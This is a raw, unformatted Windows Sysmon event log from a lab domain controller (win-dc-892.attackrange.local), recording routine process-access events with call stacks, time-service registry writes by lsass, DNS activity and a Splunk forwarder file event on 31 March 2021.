12:02:10.392{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004135Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.392{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647C-6064-2B00-00000000AE01}2536C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004134Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.392{266CAFBE-646C-6064-0F00-00000000AE01}11161508C:\Windows\System32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\termsrv.dll+a1087|c:\windows\system32\termsrv.dll+6a73d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004133Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.392{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004132Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.377{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004131Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.377{266CAFBE-646C-6064-1000-00000000AE01}11241256C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x147aC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\themeservice.dll+3de3|c:\windows\system32\themeservice.dll+26c0|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004130Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.377{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004129Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.377{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004128Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.377{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004127Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.377{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004126Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.377{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004125Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.377{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004124Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.377{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004123Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.377{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004122Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.377{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004121Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.377{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004120Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.377{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+396a|c:\windows\system32\SYSNTFY.dll+1fc3|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+527f8|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004119Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.377{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+50ff4|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004118Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.377{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+50ff4|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004117Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.377{266CAFBE-646C-6064-1000-00000000AE01}11241256C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+50ff4|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004116Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.314{266CAFBE-646C-6064-1500-00000000AE01}13162172C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000004115Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:10.299{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000000) 13241300x80000000000000004114Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:10.299{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x00017366) 13241300x80000000000000004113Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:10.299{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7261b-0xc686dfd5) 13241300x80000000000000004112Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:10.299{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d72624-0x284b47d5) 13241300x80000000000000004111Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:10.299{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7262c-0x8a0fafd5) 22542200x80000000000000004110Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.265{266CAFBE-646C-6064-1500-00000000AE01}1316attackrange.local0type: 2 win-dc-892.attackrange.local;10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000004109Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.255{266CAFBE-646C-6064-1500-00000000AE01}1316win-dc-892.attackrange.local9501type: 6 ;10.0.1.14;C:\Windows\System32\svchost.exe 23542300x80000000000000004108Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.221{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=515C4C759C39D858B32E2DEB50AED2EC,SHA256=A067E2C9F4C70BFB2F3F2E409532881F56B2BEE355FCF0E06B766D2AE1F6944D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000004107Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.128{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004106Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.128{266CAFBE-64C1-6064-9500-00000000AE01}47084700C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000004105Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.259{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local57840- 354300x80000000000000004104Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.259{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local62324- 354300x80000000000000004103Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.258{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local62687- 354300x80000000000000004102Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.258{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT 